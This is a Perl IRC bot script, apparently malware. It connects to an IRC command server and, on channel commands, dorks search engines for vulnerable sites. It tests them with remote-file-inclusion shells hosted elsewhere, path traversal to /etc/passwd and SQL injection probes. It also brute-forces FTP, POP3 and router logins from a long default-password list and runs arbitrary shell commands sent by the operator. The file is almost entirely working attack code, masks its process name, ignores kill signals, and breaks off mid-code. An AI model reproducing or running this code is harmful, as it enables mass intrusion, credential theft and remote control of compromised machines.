Untitled

#!/usr/bin/perl #-Voo_Doo NewEr DIE(); __ |
use IO::Socket::INET;
use strict;
use Mail::POP3Client;
use strict;
use Net::POP3;
use strict;
use warnings;
use Net::FTP;
 use IO::Socket;
##############
#use Parallel::ForkManager;   my $zpm=new Parallel::ForkManager(125);
my($http_stream_out,%http_loop_check,$response2,$columna,$columns,$column,$union,$inyection,$sql,$response,$tabla,$server,$channel,$chankey,$port,$nickp,$owner,$lfi_shell,$lfi_text,$rfi_shell,$rfi_text,$sql_error,$sql_text,$maxsite,$v_threads,$get_timeout,$sock,$mid,$uc,@irc_parsed,@irc_parsed1,@rfi_sites,@rfi_urls,@bosses);
#--------------------------------------------
my($server,$channel,$chankey,$port,$nickp,$owner) = ("blue.indoexploit.org","#ssd","","6667","G_test","G-one");
#--------------------------------------------
my %config = (max_childs => 60); my($ipa,$ipb,$ipc,$ipd,$sox,$user,$pass);
my $childs = 50;
my ($host,$password,$n,$buffer,$OK,$octets,$messages,$mess,$octmess,$sockz);
my $savev = "http://ave.bms-group.pl/vte.php";
my ($rfi_shell,$rfi_text) = ("http://www.nopaste.pl/Source/om7.txt?","<b>e10adc3949ba59abbe56e057f20f883e<\/b>");
my($sql_error,$sql_text) = ("-'","sql syntax|sql error|right syntax to use near");
my($lfi_shell,$lfi_text) = ("../../../../../etc/passwd%00","root:(.+):(.+):(.+):(.+):(.+):(.+)"); #Add a NULL byte
my @tabele=('orders','order','customer','customers','payment','payments'); #my @kolumny=('ccv','cvv','cvs','ccv2');

#--------------------------------------------
my @http_AU_Voo = ("ftp:ftp","root:123456","root:anko","root:nosoup4u","root:uClinux","root:ubnt","root:root","admin:1111","root:admin","telnet:telnet","admin:12345","vagrant:vagrant","CISCO:CISCO","test:test","guest:guest","root:password","admin:password","operator:operator","ubnt:ubnt","root:toor","support:support","admin:admin","admin:1234","root:root","root:1234","usuario:usuario","user:user","root:d1sn4t3n*123/","root:rpitc","root:waldo","root:raspberrypi","root:admin","root:dreambox","root:0000","root:1234","root:1234","root:welc0me","root:waldo","root:000000","root:system","root:rpitc","root:admintrup","root:seiko2005","root:rpitc","root:dreambox","root:rpitc","root:system","root:ubnt","root:raspberrypi","root:-","homun:q1w2e3r4","pi:raspberry","pi:raspberryraspberry993311","bkpmes:bkpmes","root:admintrup","root:1234","root:seiko2005","root:admin","root:111111","root:admin","root:seiko2005","root:openelec","root:xmhdipc","root:admintrup","root:openelec","root:xmhdipc","root:0000","root:xmhdipc","root:Zte521","root:ubnt","root:12345","root:root","donrepara:d1sn4t3n*123/","admin:sysuser","root:root123","root:123456","root:Gr!gR$891","ma2:Miguel1985","root:xmhdipc","root:welc0me","root:Zte521","root:password","root:12345","root:nosoup4u","root:waldo","root:system","root:111111","root:waldo","root:ubnt","root:seiko2005","root:system","root:welc0me","root:openelec","root:xmhdipc","root:default","root:ubnt","root:admintrup","root:seiko2005","root:password","menu:gbl123!@#","root:Hiersun2017@","root:system","root:anko","root:0000","root:0000","root:default","root:system","root:nosoup4u","root:root","root:000000","root:1234","root:system","root:Zte521","root:waldo","root:seiko2005","root:000000","root:welc0me","root:admin","root:rpitc","root:anko","root:1234","root:welc0me","root:111111","root:12345","root:password","root:openelec","root:raspberrypi","root:system","root:seiko2005","root:123456","jboss:123456","root:db00Hdear$2017","root:root","root:Vaquita51611235",":","admin:12345","master:12345","support:support","1234:1234","admin:admin","super:super","root:admin","root:root","root:cycl3R0cks!","admin:","admin:&","admin:<Any pass>","admin:0000","admin:0987654321","admin:1","admin:1111","admin:11111","admin:111111","admin:123","admin:123123","admin:123321","admin:1234","admin:12345","admin:123456","admin:1234567","admin:12345678","admin:123456789","admin:1234567890","admin:123654","admin:159753","admin:159753","admin:1q2w3e4r","admin:1qaz2wsx","admin:1qazxsw2","admin:22","admin:2222","admin:4321","admin:4dm1n","admin:7ujMko0admin","admin:abc123","admin:admin","Admin:admin","admin:admin01","admin:admin1","admin:admin12","admin:admin123","admin:admin1234","admin:admin12345","admin:admin123456","admin:administrator","admin:adslolitec","admin:adslolitec","admin:AitbISP4eCiG","admin:<Any pass>","admin:articon","admin:asante","admin:asd","admin:atlantis","admin:barricade","admin:baseball","admin:change","admin:changeme","admin:cisco","admin:client","admin:default","admin:demo","admin:diamond","admin:dragon","admin:epicrouter","admin:ftp","admin:ftpuser","admin:guest","admin:guest","admin:hello","admin:heslo","admin:ironport","admin:manager","admin:master","admin:monitor","admin:motorola","admin:netadmin","admin:ninja","admin:nopass","admin:ololo","admin:openelec","admin:operator","admin:osmc","admin:pass","admin:passw0rd","admin:password","admin:password123","admin:public","admin:q1w2e3r4","admin:q1w2e3r4","admin:qazwsx","admin:qwerty","admin:raspberry","admin:root","admin:secure","admin:service","admin:service123","admin:setup","admin:sshd","admin:super","admin:support","admin:switch","admin:system","admin:test","admin:test123","admin:ubnt","admin:user","admin:user123","admin:uucp","admin:ipcam_rt5350","admin:cat1029","admin:vertex25ektks123","admin:7ujMko0admin","admin:vizxv","admin:antslq","admin:1001chin","admin:5up","admin:zhongxing","admin:1234qwer","admin:qazxsw","admin:ttnet","admin:zsun1188","admin:oelinux123","admin:oelinux1234","admin:ivdev","admin:GM8182","admin:zyad1234","admin:smcadmin","admin:aquario","admin:aquario","admin:alpine","admin:hunt5759","admin:meinsm","1234:","1234:<Any pass>","1234:111111","1234:123","1234:1234","1234:12345","1234:1234567890","1234:admin","1234:<Any Pass>","1234:nopass","root:","Root:","root:!QAZ2wsx","root:<Any pass>","root:0000","root:000000","root:0987654321","root:0987654321","root:1","root:11111","root:111111","root:121212","root:123","root:123.com","root:123123","root:123321","root:1234","root:12345","root:123456","root:1234567","root:12345678","root:123456789","root:1234567890","root:123qwe","root:159753","root:1q2w3e","root:1q2w3e4r","root:1q2w3e4r5t","root:1q2w3e4r5t","root:1qaz!QAZ","root:1qaz2wsx","root:1qazxsw2","root:31415926","root:5up","root:666666","root:7ujMko0admin","root:88888888","root:987654321","root:a","root:a123456","root:abc123","root:abcd1234","root:access","root:admin","root:admin01","root:admin1","root:admin123","root:adminadmin","root:adminpassword","root:adminpassword","root:alpine","root:anypass","root:aquario","root:ascend","root:asdf1234","root:athens","root:attack","root:blender","root:calvin","root:casa","root:centos","root:changeme","root:Cisco","root:cisco","root:cms500","root:default","root:dragon","root:dreambox","root:fivranne","root:fivranne","root:football","root:juantech","root:jvbzd","root:klv123","root:klv1234","root:letacla","root:letmein","root:live","root:manager","root:master","root:Mau'dib","root:monkey","root:nimda","root:nopass","root:openelec","root:operator","root:p","root:password","root:permit","root:pfsense","root:pi","root:plcmspip","root:public","root:q1w2e3r4t5","root:qazwsx","root:qwe123","root:qwerty","root:raspberry","root:redhat","root:root","admin:admin","admin:password","admin:7ujMko0admin","admin:admin123","admin:admin1","admin:password","admin:1111","admin:manager","admin:7ujMko0admin","admin:admin1","admin:pfsense","admin:default","admin:1111","admin:admin123","admin:default","admin:password","admin:admin","admin:motorola","admin:12345","admin:default","web:sdAakx4A","root:dreambox","root:root","passfeel:q1w2e3r4","user:user1234","root:root","revisor:revisor","admin:admin","admin:manager","admin:aerohive","admin:changeme","admin:admin","admin:admin1234","admin:1111","admin:manager","admin:motorola","admin:manager","admin:password","admin:1234","admin:admin1","admin:aerohive","admin:admin","admin:admin1234","admin:admin1","admin:admin1234","admin:12345","admin:password","admin:default","menu:","invoices:invoices","support:support","support:support","support:support","support:support","support:support","support:support","support:support","support:support","support:support","support:support","support:support","support:support","support:support","support:support","support:support","support:support","support:support","support:support","support:support","support:support","support:support","root:dreambox","root:raspberrypi","root:admintrup","root:000000","root:ubnt","root:rpitc","root:111111","root:root","root:HKhiersun2017","admin:admin1234","admin:default","admin:1111","admin:12345","admin:admin","admin:admin","admin:1111","admin:aerohive","admin:12345","admin:default","admin:1234","admin:1234","admin:7ujMko0admin","admin:admin","admin:admin123","admin:admin1","admin:admin1234","admin:admin","admin:12345","admin:7ujMko0admin","admin:12345","admin:password","admin:admin1","admin:changeme","admin:7ujMko0admin","admin:default","admin:admin1234","admin:1111","admin:password","admin:admin","admin:1111","admin:admin1234","admin:password","admin:1111","admin:pfsense","admin:motorola","admin:1111","admin:admin1234","admin:password","admin:pfsense","admin:1234","admin:admin1","root:root","dkalathil:Wwse123","root:default","root:xmhdipc","root:dreambox","root:system","root:12345","root:rpitc","root:xmhdipc","root:111111","root:openelec","root:rpitc","root:admintrup","root:seiko2005","root:welc0me","root:raspberrypi","root:system","root:12345","root:dreambox","root:password","root:12345","root:admintrup","root:raspberrypi",":","service:service","service:service","service:service","service:service","service:service","service:service","service:service","service:service","service:service","service:service","service:service","service:service","service:service","service:service","service:service","service:service","service:service","service:service","service:service","service:service","service:service","admin:123","geozhsia:LUbIv5NmvJDOS7Hkp3eddaACToR2oh29","cav:cavsys","relic:q1w2e3r4","root:root","root:root","pi:raspberry","pi:raspberryraspberry993311","idst6:q1w2e3r4","root:root","root:admin","admin:admin","telnet:telnet","ubnt:ubnt","user:user","support:support","0000:0000","1111:1111","admin:password","admin:1234567890","osmc:osmc","pi:raspberry","operator:operator","pi:1234","root:pi","user:123456","service:service","root:linux","root:password","test:test","phion:123","root:anko","root:waldo","root:nosoup4u","root:rpitc","root:0000","root:Zte521","root:welc0me","root:welc0me","root:admin","root:system","root:anko","root:uClinux","root:xmhdipc","root:12345","root:system","root:0000","root:admin","root:0000","root:waldo","root:nosoup4u","root:uClinux","debian-spamd:debian-spamd","root:123456","root:111111","admin:12345","root:xmhdipc","root:dreambox","admin:changeme","root:rpitc","root:admin","admin:motorola","root:1234","root:admin","admin:admin1","root:ubnt","root:12345","root:rpitc","admin:7ujMko0admin","root:0000","root:uClinux","admin:1111","root:root","root:123456","root:dreambox","admin:manager","root:0000","root:nosoup4u","admin:admin1","root:system","root:welc0me","admin:manager","root:welc0me","root:waldo","admin:1234","root:seiko2005","root:root","admin:default","root:111111","root:rpitc","admin:1234","root:ubnt","root:admin","admin:admin123","root:nosoup4u","root:Zte521","admin:admin1234","root:123456","root:raspberrypi","admin:12345","root:000000","root:waldo","admin:manager","root:seiko2005","root:dreambox","admin:1234","root:1234","root:admin","admin:admin123","root:12345","root:system","admin:admin1234","root:password","root:admintrup","admin:changeme","root:0000","root:waldo","admin:default","root:admin","root:waldo","root:0000","root:anko","root:nosoup4u","root:password","root:111111","root:default","root:raspberrypi","root:123456","root:anko","root:Zte521","root:nosoup4u","root:Zte521","root:1234","root:1234","root:uClinux","root:dreambox","root:dreambox","root:system","root:000000","root:nosoup4u","root:seiko2005","root:12345","root:111111","root:admintrup","root:seiko2005","root:admintrup","root:anko","root:root","root:root","iedu:q1w2e3r4","root:vmware123","root:vmware","root:root123456789","root:123456","root:muiemulta","root:pula","root:muiema","root:260788","aalbornoz:qwaszx1725","root:root","root:Ps856094533238","root:vmware123","root:vmware","root:root123456789","root:raspberrypi","root:openelec","root:admintrup","root:rpitc","root:default","root:default","root:raspberrypi","root:xmhdipc","root:welc0me","root:nosoup4u","root:admin","root:root","root:root","proxy:proxy");
my ($maxsite,$v_threads,$get_timeout) = (20,15,14); $0 = "aVe";
%SIG = ('HUP','IGNORE','INT','IGNORE','PIPE','IGNORE','TERM','IGNORE'); # wsill not be able to !kill scans
#--------------------------------------------
sub randnick($){return "$_[0]" . int(rand(1)*100) . int(rand(1)*200) . int(rand(1)*300);} #sub randnick($){return "$_[0]";}
sub send_raw($){print $sock "$_[0]\r\n";}
sub send_msg($$){print $sock "PRIVMSG $_[0] :$_[1]\r\n";}
sub in_array {for(my $x=1;$x<=$#_;$x++){if($_[$x] eq $_[0]){return $x;}}return 0;}
sub array_num {my $y=0;for(my $x=1;$x<=$#_;$x++){if($_[$x] eq $_[0]){$y++;}}return $y;}
sub remove_dups(@){my(@Uns,@S,$x) = (@_);for($x=0;$x<=$#Uns;$x++){push(@S,$Uns[$x]) unless in_array($Uns[$x],@S);}return @S;}
sub tchomp {my $text = shift;$text =~ s/^(.*?)(?:\x0D\x0A|\x0A|\x0D|\x0C|\x{2028}|\x{2029})/$1/s;return $text;}
sub urlencode($){ my $unclean = shift; $unclean =~ s/\?/\%3f/gi; $unclean =~ s/ /\+/gi; $unclean =~ s/:/\%3A/gi; $unclean =~ s/\//\%2F/gi; $unclean =~ s/&/\%26/gi; $unclean =~ s/\"/\%22/gi; $unclean =~ s/\'/\%27/gi; $unclean =~ s/,/\%2C/gi; $unclean =~ s/\\/\%5C/gi; return $unclean; }
sub urldecode($){ my $clean = shift; $clean =~ s/\%3f/\?/gi; $clean =~ s/\+/ /gi; $clean =~ s/\%3A/:/gi; $clean =~ s/\%2F/\//gi; $clean =~ s/\%26/&/gi; $clean =~ s/\%22/\"/gi; $clean =~ s/\%27/\'/gi; $clean =~ s/\%2C/,/gi; $clean =~ s/\%5C/\\/gi; return $clean; }
sub getreq($){
	my($url,$query,$xcon,$host,$get,@content,@ags) = ($_[0]);
	@ags = ("Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.6) Gecko/20050223 Firefox/1.0.1","Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20061201 Firefox/2.0.0.4 (Ubuntu-feisty)","Microsoft Pocket Internet Explorer/0.6","Microsoft Internet Explorer/4.0b1 (Windows 95)");
	$url =~ m/http:\/\/(.*?)\/(.*)/;
	($host,$url,$query) = ($1,"$1/$2","/$2");
	eval{
		local $SIG{ALRM} = sub{print("[-] Timed out - $url\n");die;};
		alarm $get_timeout;
		$get = IO::Socket::INET->new(PeerAddr=>"$host:80",Proto=>"tcp") or sub{die("FAILED\n");};
		print $get "GET $query HTTP/1.0\r\nHost: $host\r\nUser-Agent: " . $ags[int(rand(0)*$#ags)] . "\r\nAccept: */*\r\nConnection: close\r\n\r\n";
		@content = <$get>;
		$xcon = "@content";
		close($get);
		alarm 0;
	}; return urldecode($xcon);
}
sub rfi_onet($$){
	my($dork,$start,$content,$dom,$page,$dad,$url) = (urlencode($_[0]),$_[1]);
	print "[Onet-] http://szukaj.onet.pl/0,$start,query.html?qt=$dork\n";
	$content = &getreq("http://szukaj.onet.pl/0,$start,query.html?qt=$dork");
	if($content =~ m/<h1>We\'re sorry\.\.\.<\/h1>/){print "[0n3t] Google killed you\n";return 0;}
	while($content =~ m/<a href=\"http:\/\/(.*?)\"/ig){
		$url = "http://$1";
		if(($url =~ m/http:\/\/(www\.|)([\w\-\_\.]*)\/(.*?)$/) && (&array_num("http://$1$2",@rfi_sites)<=$maxsite) &&  (!in_array($url,@rfi_urls))){
			($dom,$page) = ("http://$1$2","/$3");
			$dad = $dom.$page;
			push(@rfi_sites,$dom);
			push(@rfi_urls,$dad);
			#print "[GOO-SCAN] $dad\n";
			$uc++;
		}
	}
	if($content =~ m/button nextActive\">Nast/){ print "[0n3t] Another page: " . ($start + 100) . "\n"; &rfi_onet($dork,($start + 1),$_[2]); }
return $uc;
}

sub url_validate(@){
	my($choice,$pagen) = ($_[0],$_[1]);
	my(@urls,@fails,@paramlist,@params,@checks,$url,$tmp1,$tmp2,$chk,$m_add,$m_text,$badu,$count,$count2,@rfis);
	$badu = "(\w*\.baidu\.)|(\w*\.microsoft\.)|(\w*\.onet\.)|(\w*\.live\.)|(\w*\.w3\.org)|(\w*\.msnscache\.)|(\w*\.google\.)|(\w*\.yahoo\.)|(\w*\.aol\.)|(\w*\.altavista\.)|(\w*\.ask\.)|(209\.85\.173\.104)";
	for(2..$#_){ if($_[$_] !~ m/$badu/i){ push(@urls,$_[$_]); } }
	@urls = &remove_dups(@urls);
	foreach(@urls){ push(@rfis,$_) if $_ =~ m/^http:\/\/(www\.|)([\w\-\_\.]*)\/([\w\-\_\.\/\;]*)\?([\w\-\_\.]*)=(.*?)$/; }
	if(@urls){
		if($choice eq "DORK"){
			foreach $url(@urls){
				$m_add = $rfi_shell; $m_text = $rfi_text;
				if($url =~ m/^http:\/\/(www\.|)([\w\-\_\.]*)\/([a-z0-9\.\-\_\/]*)\/([\w\-\_\.\/\;]*)/){ push(@checks,"http://$1$2/$3/$pagen"); }
				elsif($url =~ m/^http:\/\/(www\.|)([\w\-\_\.]*)\/([\w\-\_\.\/\;]*)/){
					push(@checks,"http://$1$2/$pagen");
				}
			}
		}
		elsif($choice eq "RFI") {
			foreach $url(@rfis){
				$m_add = $rfi_shell;
				$m_text = $rfi_text;
				@paramlist = split(/\?/,$url);
				@params = split(/=/,$paramlist[1]);
				$tmp1 = "";
				for(0..$#params-1){
					$tmp1 .= $params[$_] . "="; $tmp2 = $paramlist[0] . "?" . $tmp1;
					push(@checks,$tmp2);
				}
			}
		}
		elsif($choice eq "LFI") {
			foreach $url(@rfis){
				$m_add = $lfi_shell;
				$m_text = $lfi_text;
				@paramlist = split(/\?/,$url);
				@params = split(/=/,$paramlist[1]);
				$tmp1 = "";
				for(0..$#params-1){
					$tmp1 .= $params[$_] . "="; $tmp2 = $paramlist[0] . "?" . $tmp1;
					push(@checks,$tmp2);
				}
			}
		}
		elsif($choice eq "SQL"){
			foreach $url(@rfis){
				$m_add = $sql_error;
				$m_text = $sql_text;
				@paramlist = split(/\?/,$url);
				@params = split(/=/,$paramlist[1]);
				$tmp1 = "";
				for(0..$#params-1){
					$tmp1 .= $params[$_] . "="; $tmp2 = $paramlist[0] . "?" . $tmp1;
					push(@checks,$tmp2);
				}
			}
		}
	}
	else{ print "[VAL-] [$choice] No sites to clean\n"; return 0; }
	@checks = &remove_dups(@checks);
	#send_msg($channel,"[VAL] [$choice] " . ($#checks+1) . " URLS to check");
	print "[URL VALIDATION] [$choice] " . ($#checks+1) . " URLS TO CHECK\n";
	foreach $chk(@checks){
		$count++; $count2++; $chk .= $m_add;
		if(&getreq($chk) =~ m/$m_text/i){ send_msg($channel,"$chk"); print "[VAL+] Win: $chk\n\n"; }
		else{ print "[VAL-] Fail: $chk\n"; }
		if($count==250){ send_msg($channel,"[VAL] [$choice] $count2 of " . $#checks . " urls completed"); $count=0; }
		elsif($checks[$#checks] eq $checks[$count]){
			#send_msg($channel,"[VAL] [$choice] All " . $#checks . " urls completed");
			$count=0; $count2=0;
		}
	}
	return 0;
}

$mid = fork(); exit if $mid; exit if undef $mid;
$sock = new IO::Socket::INET(PeerAddr=>"$server:$port",Proto=>"tcp");
die("Couldn't connect: $!\n") unless $sock;
my $nick = &randnick($nickp);
&send_raw("NICK " . $nick); &send_raw("USER " . &randnick("s") . " " . &randnick("z") . " * :HELLOSIR");
if($chankey){&send_raw("JOIN $channel $chankey");}else{&send_raw("JOIN $channel");}
while(<$sock>){
	@irc_parsed = split(/\r\n/,&tchomp($_));
	@irc_parsed1 = split(/ /,$irc_parsed[0]);
	print $irc_parsed[0] . "\n";
	if($irc_parsed1[0] eq "PING"){ send_raw("PONG " . $irc_parsed1[1]); }
	elsif($irc_parsed1[1] eq "001"){ if($chankey){&send_raw("JOIN $channel $chankey");}else{&send_raw("JOIN $channel");} }
	elsif(($irc_parsed1[1] eq "433") || ($irc_parsed1[1] eq "436")){ &send_raw("NICK " . randnick($nickp)); send_raw("JOIN " . $channel); }
	elsif($irc_parsed1[1] eq "475"){ send_msg($owner,"key $chankey for $channel is WRONG"); die("Channel key is WRONG\n"); }
	#--------------
	elsif($irc_parsed1[3] =~ m/(.*)http:\/\/(.*)[=](.+?)'/ || $irc_parsed1[3] =~ m/http:\/\/(.*)[=]-1/ || $irc_parsed1[3] =~ m/(.*)http:\/\/(.*)[=]/ || $irc_parsed1[3] =~ m/(.*)http:\/\/(.*)[=]-1/ || $irc_parsed1[3] =~ m/(.*)http:\/\/(.*)[=]'/){ if(my $xid = fork){ waitpid($xid,0); } else{ if(fork){ exit; } else{ my $link = "http://".$2."="; &sqlbrute($link,20); exit; } } }
	elsif($irc_parsed1[3] =~ m/(.*)http:\/\/(.*)[=](.+?)passwd/ || $irc_parsed1[3] =~ m/(.*)http:\/\/(.*)[=](.+?)passwd%00/){ if(my $xid = fork){ waitpid($xid,0); } else{ if(fork){ exit; } else{ my $link = "http://".$2."="; &lfibrute($link); exit; } } }
	#--------------
	elsif($irc_parsed1[1] eq "KICK"){ if($chankey){ &send_raw("JOIN $channel"); } else{ &send_raw("JOIN $channel $chankey"); } }
	elsif(($irc_parsed1[1] eq "JOIN") && (substr($irc_parsed1[2],1) ne $channel)){  &send_raw("PART ".substr($irc_parsed1[2],1)); }
	if(($irc_parsed1[0] =~ m/:(.+)!(.+)\@(.+)/) || ($irc_parsed1[0] =~ m/:(.+)!~(.+)\@(.+)/)){
		if(($irc_parsed1[4] eq $nick) || ($irc_parsed1[4] eq "all")){
			$irc_parsed1[0] = $1;
			if($irc_parsed1[3] eq ":!wypierdalac"){ send_raw("QUIT"); exit; }
			elsif(($irc_parsed1[3] eq ":!kill") && ($irc_parsed1[5] =~ m/(\d*)/)){
				my $pid = $irc_parsed1[5];
				my $ppid = "$$";
				if($pid eq $ppid){ send_msg($irc_parsed1[0],"[PROC] Could not kill $pid, it is scan process"); }
				else{
					my $Prc = system("kill -9 $pid");
					if(!$Prc){ send_msg($channel,"[PROC] PID $pid {KILLED}"); }
					elsif($Prc eq "256"){ send_msg($channel,"[PROC] PID $pid {NO EXIST}"); }
					else{ send_msg($channel,"[PROC] PID $pid {OTHER ERROR}"); }
				}
			}
			elsif(($irc_parsed1[3] eq ":!rfishell") && ($irc_parsed1[5] =~ m/http:\/\/(.+)/)){
				if(!$1 =~ m/\?$/){ $rfi_shell = "http://".$1."?"; } else{ $rfi_shell = "http://$1"; }
				send_msg($channel,"[RFI] shell set: $rfi_shell");
			}
			elsif(($irc_parsed1[3] eq ":!rfishell") && (!$irc_parsed1[5])){
				if($rfi_shell){ send_msg($channel,"[RFI] Shell: $rfi_shell"); }
				elsif(!$rfi_shell){ send_msg($channel,"[RFI] No shell: set one with !rfishell $nick <RFI script/shell>"); }
			}
			elsif(($irc_parsed1[3] eq ":!rfitext") && (!$irc_parsed1[5])){
				if($rfi_text){ send_msg($channel,"[RFI] Text: $rfi_text"); }
				elsif(!$rfi_text){ send_msg($channel,"[RFI] No text: set one with !rfitext $nick <text in shell>"); }
			}
			elsif(($irc_parsed1[3] eq ":!rfitext") && ($irc_parsed1[5])){
				$rfi_text = "";
				for(5..$#irc_parsed1){ $rfi_text .= $irc_parsed1[$_] . " "; }
				$rfi_text = substr($rfi_text,0,length($rfi_text)-1);
				send_msg($channel,"[RFI] text set: $rfi_text");
			}
			elsif(($irc_parsed1[3] eq ":!sqlerror") && ($irc_parsed1[5])){
				$sql_error = "";
				for(5..$#irc_parsed1){ $sql_error .= $irc_parsed1[$_] . " "; }
				$sql_error = substr($sql_error,0,length($sql_error)-1);
				send_msg($channel,"[SQL] error set: $sql_error");
			}
			elsif(($irc_parsed1[3] eq ":!sqlerror") && (!$irc_parsed1[5])){
				if($sql_error){ send_msg($channel,"[SQL] Error: $sql_error"); }
				elsif(!$sql_error){
					send_msg($channel,"[SQL] No error: set one with !sqlerror $nick <sql error>");
				}
			}
			elsif(($irc_parsed1[3] eq ":!sqltext") && ($irc_parsed1[5])){
				$sql_text = "";
				for(5..$#irc_parsed1){ $sql_text .= $irc_parsed1[$_] . " "; }
				$sql_text = substr($sql_text,0,length($sql_text)-1);
				send_msg($channel,"[SQL] text set: $sql_text");
			}
			elsif(($irc_parsed1[3] eq ":!sqltext") && (!$irc_parsed1[5])){
				if($rfi_text){ send_msg($channel,"[SQL] Text: $sql_text"); }
				elsif(!$rfi_text){ send_msg($channel,"[SQL] No text: set one with !sqltext $nick <SQL error text>"); }
			}

			elsif($irc_parsed1[3] eq ":!test"){ if(my $xid = fork){ waitpid($xid,0); } else{ if(fork){ exit; } else{ send_msg($channel,"[TEST] Working!"); exit; } } }

			 elsif(($irc_parsed1[3] eq ":!podajlfi") && ($irc_parsed1[5])){
				my($dork); for(5..$#irc_parsed1){$dork .= $irc_parsed1[$_] . " ";} $dork = substr($dork,0,length($dork)-1);
				if(my $xid = fork){ waitpid($xid,0); }
				else{
					if(my $dad=fork){ send_msg($channel,"[SYS] Running system: $dork - Stop with !kill $nick $dad"); exit; }
					else{
						my $save = "/tmp/".int(rand(1)*100);
						 &getstore($dork,$save);

						send_msg($channel,"safed $dork $save");
						my $czaj = $save; open(FILE, $czaj); print("open $czaj \r\n");
						while(<FILE>) {
						my $jo=$_; chomp $jo; $jo=~s/\n//; $jo=~s/\r//;
						if($jo=~ /(.*?[=])/g){ &lfibrute($1); }
 #sleep 1*60; # need ?
 										}
						close(FILE); `rm -rf $czaj`;
					  	}
						exit;
					}
				}
			 elsif(($irc_parsed1[3] eq ":!podajsql") && ($irc_parsed1[5])){
			my($dork); for(5..$#irc_parsed1){$dork .= $irc_parsed1[$_] . " ";} $dork = substr($dork,0,length($dork)-1);
				if(my $xid = fork){ waitpid($xid,0); }
				else{
			if(my $dad=fork){ send_msg($channel,"[SYS] Running system: $dork - Stop with !kill $nick $dad"); exit; }
					else{
						my $save = "/tmp/sqllist.txt";
						system("wget ".$dork." -O ".$save);
						 #&getstore($dork,$save);

						send_msg($channel,"safed $dork $save");
						my $czaj = $save; open(FILE, $czaj); print("open $czaj \r\n");
 #$zpm->start and next;
						while(<FILE>) {
						my $jo=$_; chomp $jo; $jo=~s/\n//; $jo=~s/\r//;
						if($jo=~ /(.*?[=])/g){ print($1."\n"); 	&sqlbrute($1,20); }
 #sleep 1*60; # need ?
 									#$zpm->finish;
 									 	}
						close(FILE); `rm -rf $czaj`;
					  	}
						exit;
					}
				}
			 elsif(($irc_parsed1[3] eq ":!podajpop3") && ($irc_parsed1[5])){
			my($dork); for(5..$#irc_parsed1){$dork .= $irc_parsed1[$_] . " ";} $dork = substr($dork,0,length($dork)-1);
				if(my $xid = fork){ waitpid($xid,0); }
				else{
			if(my $dad=fork){ send_msg($channel,"[SYS] Running system: $dork - Stop with !kill $nick $dad"); exit; }
					else{
						my $save = "/tmp/x".int(rand(1)*100);
						system("wget ".$dork." -O ".$save);
						 #&getstore($dork,$save);

						send_msg($channel,"safed $dork $save");
						my $czaj = $save; open(FILE, $czaj); print("open $czaj \r\n");
						while(<FILE>) { #$zpm->start and next;
						my $jo=$_; chomp $jo; $jo=~s/\n//; $jo=~s/\r//;
						 if($jo=~ /(.*)\@(.*):(.*)/g){
      my $mail = $1; my $dom = $2; my $pass = $3; my $cal = $mail.'@'.$dom.':'.$pass;
      if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &pop3($cal); } }

 } sleep 1; # need ?
 										}
						close(FILE); # `rm -rf $czaj`;
					  	}
						exit;
					}
				}


			 elsif(($irc_parsed1[3] eq ":!system") && ($irc_parsed1[5])){
				my($dork);
				for(5..$#irc_parsed1){$dork .= $irc_parsed1[$_] . " ";}
				$dork = substr($dork,0,length($dork)-1);
				if(my $xid = fork){ waitpid($xid,0); }
				else{
					if(my $dad=fork){
					 	send_msg($channel,"[SYS] Running system: $dork - Stop with !kill $nick $dad");
						exit;
					}
					else{
						my @cmdresult = split(/\n/,`$dork`);
						foreach(@cmdresult){
							send_msg($irc_parsed1[0],"$_");
							sleep(2);
						}
						exit;
					}
				}
			}
			 elsif(($irc_parsed1[3] eq ":!router") && ($irc_parsed1[5])){
				my($dork);
				for(5..$#irc_parsed1){$dork .= $irc_parsed1[$_] . " ";}
				$dork = substr($dork,0,length($dork)-1);
				if(my $xid = fork){ waitpid($xid,0); }
				else{
					if(my $dad=fork){
					 	send_msg($channel,"[SYS] Running system: $dork - Stop with !kill $nick $dad");
						exit;
					}
					else{
						&main($dork,"rou");
						}
						exit;
					}
				}
						 elsif(($irc_parsed1[3] eq ":!ftp") && ($irc_parsed1[5])){
				my($dork);
				for(5..$#irc_parsed1){$dork .= $irc_parsed1[$_] . " ";}
				$dork = substr($dork,0,length($dork)-1);
				if(my $xid = fork){ waitpid($xid,0); }
				else{
					if(my $dad=fork){
					 	send_msg($channel,"[SYS] Running system: $dork - Stop with !kill $nick $dad");
						exit;
					} else{ &main($dork,"ftp"); }
						exit;
					}
				}
						 elsif(($irc_parsed1[3] eq ":!pop3") && ($irc_parsed1[5])){
				my($dork);
				for(5..$#irc_parsed1){$dork .= $irc_parsed1[$_] . " ";}
				$dork = substr($dork,0,length($dork)-1);
				if(my $xid = fork){ waitpid($xid,0); }
				else{
					if(my $dad=fork){
					 	#send_msg($channel,"[SYS] Running system: $dork - Stop with !kill $nick $dad");
						exit;
					} else{ &pop3($dork); &nag($user,$password,$host); }
						exit;
					}
				}

			elsif($irc_parsed1[3] eq ":!procs"){
				if(my $xid = fork){ waitpid($xid,0); }
				else{
					if(fork){ exit; } else{
						my @procs = split(/\n/,`ps aux | grep $0`);
						foreach(@procs){ send_msg($irc_parsed1[0],"[PROC] PS: $_"); sleep(2); }
						exit;
					}
				}
			}
			elsif(($irc_parsed1[3] eq ":!rfi") && ($irc_parsed1[5])){
				my($dork);
				for(5..$#irc_parsed1){$dork .= $irc_parsed1[$_] . " ";}
				$dork = substr($dork,0,length($dork)-1);
				my $sc1 = fork;
				if($sc1){ waitpid($sc1,0); } elsif($sc1 == 0){ my $sc2 = fork;
					if($sc2){ send_msg($irc_parsed1[0],"[RFI] Dork: \"$dork\" - Stop with !kill $nick $sc2"); exit; }
					elsif($sc2==0){
						send_msg($channel,"[RFI] Dork: \"$dork\" Starting");
						send_msg($channel,"[RFI] [Onet] Dork: \"$dork\" - Results: " . &rfi_onet($dork,"0")); $uc=0;
						if($#rfi_urls){ #send_msg($channel,"[RFI] Dork: \"$dork\" - Validating " . ($#rfi_urls+1) . " URL's");
							&url_validate("RFI","",@rfi_urls); send_msg($channel,"[RFI] Dork: \"$dork\" - Finished");
						}
						else{ send_msg($channel,"[RFI] [MULTISCAN] Dork: \"$dork\" Finished {NO URLS FOUND}"); }
